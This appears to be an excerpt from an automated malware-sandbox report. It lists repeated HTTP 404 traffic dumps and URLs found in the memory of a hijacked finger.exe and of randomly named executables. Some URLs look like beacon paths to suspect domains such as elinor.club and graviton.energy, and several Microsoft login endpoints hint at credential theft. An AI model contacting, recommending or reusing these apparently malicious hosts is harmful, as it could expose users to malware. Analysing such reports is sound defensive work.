65 72 72 6f 72 2d 70 61 67 65 2d
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:17:11 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:17:13 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:17:16 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:17:19 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: finger.exe, 00000008.00000002.3271932261.0000000003D28000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000002EA8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://elinor.club/1ne4/?uZ9=wvL0WTq0tnld4P&1JgHkl=Xmf7DtAQ/BnKPHUt3tFFF
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/js/min.js?v2.3
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/28903/search.png)
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/28905/arrrow.png)
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/29590/bg1.png)
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
                Source: finger.exe, 00000008.00000002.3271932261.000000000361C000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.000000000279C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.2225572633.00000000073BC000.00000004.80000000.00040000.00000000.sdmp, 72STaC6BmljfbIQ.exeString found in binary or memory: http://localhost/arkanoid_server/requests.php
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.Mohawktooldie.online
                Source: PWhloTdOLAusO.exe, 0000000B.00000002.3270119796.000000000088F000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.graviton.energy
                Source: finger.exe, 00000008.00000002.3271932261.0000000004502000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000003682000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.graviton.energy/../images/bg-landing-page.jpg
                Source: finger.exe, 00000008.00000002.3271932261.0000000004502000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000003682000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.graviton.energy/css/app.css
                Source: finger.exe, 00000008.00000002.3271932261.0000000004502000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000003682000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.graviton.energy/images/favicons/apple-touch-icon.png
                Source: finger.exe, 00000008.00000002.3271932261.0000000004502000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000003682000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.graviton.energy/images/favicons/browserconfig.xml
                Source: finger.exe, 00000008.00000002.3271932261.0000000004502000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000003682000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.graviton.energy/images/favicons/favicon-16x16.png
                Source: finger.exe, 00000008.00000002.3271932261.0000000004502000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000003682000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.graviton.energy/images/favicons/favicon-32x32.png
                Source: finger.exe, 00000008.00000002.3271932261.0000000004502000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000003682000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.graviton.energy/images/favicons/favicon.ico
                Source: finger.exe, 00000008.00000002.3271932261.0000000004502000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000003682000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.graviton.energy/images/favicons/manifest.json
                Source: finger.exe, 00000008.00000002.3271932261.0000000004502000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000003682000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.graviton.energy/images/favicons/safari-pinned-tab.svg
                Source: finger.exe, 00000008.00000002.3271932261.0000000004502000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000003682000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.graviton.energy/images/logo-hosttech.svg
                Source: finger.exe, 00000008.00000002.3271932261.0000000004502000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.0000000003682000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.graviton.energy/js/app.js
                Source: PWhloTdOLAusO.exe, 0000000B.00000002.3270119796.000000000088F000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.graviton.energy/y54z/
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mohawktooldie.online/Best_Hair_Straighteners.cfm?fp=QUnrSg%2F6DuoEdyFsu1EUg11HixoO%2Bs7Sb
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mohawktooldie.online/Coconut_Oil_for_Hair_Growth.cfm?fp=QUnrSg%2F6DuoEdyFsu1EUg11HixoO%2B
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mohawktooldie.online/Mohawk_Carpet.cfm?fp=QUnrSg%2F6DuoEdyFsu1EUg11HixoO%2Bs7SbR6WQFOCXOm
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mohawktooldie.online/Mohawk_Hairstyles.cfm?fp=QUnrSg%2F6DuoEdyFsu1EUg11HixoO%2Bs7SbR6WQFO
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mohawktooldie.online/Organic_Hair_Products.cfm?fp=QUnrSg%2F6DuoEdyFsu1EUg11HixoO%2Bs7SbR6
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mohawktooldie.online/__media__/design/underconstructionnotice.php?d=mohawktooldie.online
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mohawktooldie.online/__media__/js/trademark.php?d=mohawktooldie.online&type=ns
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.3273850529.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mohawktooldie.online/display.cfm
                Source: finger.exe, 00000008.00000002.3271932261.000000000404C000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000031CC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://00808.vip/
                Source: finger.exe, 00000008.00000003.2120902367.0000000007A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
                Source: finger.exe, 00000008.00000003.2120902367.0000000007A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: finger.exe, 00000008.00000003.2120902367.0000000007A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: finger.exe, 00000008.00000003.2120902367.0000000007A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: finger.exe, 00000008.00000002.3271932261.0000000004370000.00000004.10000000.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
                Source: PWhloTdOLAusO.exe, 0000000B.00000002.3271203906.00000000034F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
                Source: finger.exe, 00000008.00000003.2120902367.0000000007A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: finger.exe, 00000008.00000003.2120902367.0000000007A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: finger.exe, 00000008.00000003.2120902367.0000000007A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: finger.exe, 00000008.00000002.3269614249.0000000002B99000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000008.00000002.3269614249.0000000002B6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: finger.exe, 00000008.00000002.3269614249.0000000002B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: finger.exe, 00000008.00000003.2116383635.00000000079A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: finger.exe, 00000008.00000002.3269614249.0000000002B6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: finger.exe, 00000008.00000002.3269614249.0000000002B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
                Source: finger.exe, 00000008.00000002.3269614249.0000000002B6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033Rx
                Source: finger.exe, 00000008.00000002.3269614249.0000000002B6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
